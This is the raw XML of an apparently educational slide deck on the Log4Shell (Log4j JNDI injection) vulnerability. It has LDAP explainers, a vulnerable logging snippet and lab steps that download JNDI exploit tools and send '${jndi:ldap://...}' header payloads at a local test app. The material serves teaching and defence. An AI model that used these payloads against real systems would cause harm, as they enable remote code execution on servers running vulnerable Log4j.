          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>gpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> --decrypt JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar.gpg &gt; JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> -q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3376725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https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 8888</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>curl 127.0.0.1:8080 -H 'X-Api-Version: 1.0'</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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1166624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will execute 'touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>curl 127.0.0.1:8080 -H 'X-Api-Version: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>://127.0.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}’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curl 127.0.0.1:8080 -H 'X-Api-Version: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>://127.0.0.1:1389/a}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>ldapsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> -x -H ldap://ldap-server-address -b "dc=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>example,dc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>=com" -D "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>admin,dc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>example,dc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>=com" –W</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>ldapsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> -x -H ldap://127.0.0.1:1389</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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405979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https://github.com/christophetd/log4shell-vulnerable-app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>https://www.lunasec.io/docs/blog/log4j-zero-day/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261445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@GetMapping("/")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>public String index(@RequestHeader("X-Api-Version") String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>    logger.info("Received a request for API version " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>apiVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>    return "Hello, world!";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>}</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207929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a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: An LDAP server stores information in a tree-like structure, similar to how folders and files are organized on a computer. Each piece of data is called an "entry" and has a unique identifier called a "Distinguished Name" (DN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Retrieval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers allow users and applications to search for and retrieve specific pieces of information quickly. This is especially useful for finding things like user profiles, contact details, or network resources in a large organization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers often play a crucial role in user authentication. When you log in to a system or application, it can check your credentials (like a username and password) with an LDAP server to confirm your identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: They can also manage permissions and access control. For example, they can determine who has access to certain resources based on their roles or group memberships.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Integration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers can be integrated with various systems and services, such as email servers, web applications, and network devices. This makes it easier to manage user accounts and access across an organization.</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191768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a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: An LDAP server stores information in a tree-like structure, similar to how folders and files are organized on a computer. Each piece of data is called an "entry" and has a unique identifier called a "Distinguished Name" (DN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Retrieval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers allow users and applications to search for and retrieve specific pieces of information quickly. This is especially useful for finding things like user profiles, contact details, or network resources in a large organization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers often play a crucial role in user authentication. When you log in to a system or application, it can check your credentials (like a username and password) with an LDAP server to confirm your identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: They can also manage permissions and access control. For example, they can determine who has access to certain resources based on their roles or group memberships.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Integration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers can be integrated with various systems and services, such as email servers, web applications, and network devices. This makes it easier to manage user accounts and access across an organization.</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5290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a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: An LDAP server stores information in a tree-like structure, similar to how folders and files are organized on a computer. Each piece of data is called an "entry" and has a unique identifier called a "Distinguished Name" (DN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Data Retrieval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers allow users and applications to search for and retrieve specific pieces of information quickly. This is especially useful for finding things like user profiles, contact details, or network resources in a large organization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers often play a crucial role in user authentication. When you log in to a system or application, it can check your credentials (like a username and password) with an LDAP server to confirm your identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: They can also manage permissions and access control. For example, they can determine who has access to certain resources based on their roles or group memberships.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Integration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>: LDAP servers can be integrated with various systems and services, such as email servers, web applications, and network devices. This makes it easier to manage user accounts and access across an organization.</a:t>
            </a:r>
          </a:p>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162312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https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{132FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263063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2FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34168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10.png"/><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eb.archive.org/web/20211211031401/https:/objects.githubusercontent.com/github-production-release-asset-2e65be/314785055/a6f05000-9563-11eb-9a61-aa85eca37c76?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211211%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20211211T031401Z&amp;X-Amz-Expires=300&amp;X-Amz-Signature=140e57e1827c6f42275aa5cb706fdff6dc6a02f69ef41e73769ea749db582ce0&amp;X-Amz-SignedHeaders=host&amp;actor_id=0&amp;key_id=0&amp;repo_id=314785055&amp;response-content-disposition=attachment%3B%20filename%3DJNDIExploit.v1.2.zip&amp;response-content-type=application%2Foctet-stream"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60.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.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64.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide18.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.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59.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.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54.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink29.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink20.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink11.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml"/><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65.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><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christophetd/log4shell-vulnerable-app"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Log4Shell Vulnerability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BFBF-7FF3-DE6F-997C-CB83B7387D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>1. Attackers need to identify vulnerable Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E329FA93-93AB-4D93-F06B-500F86381120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10320215" cy="1325563"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>logger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log4J</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
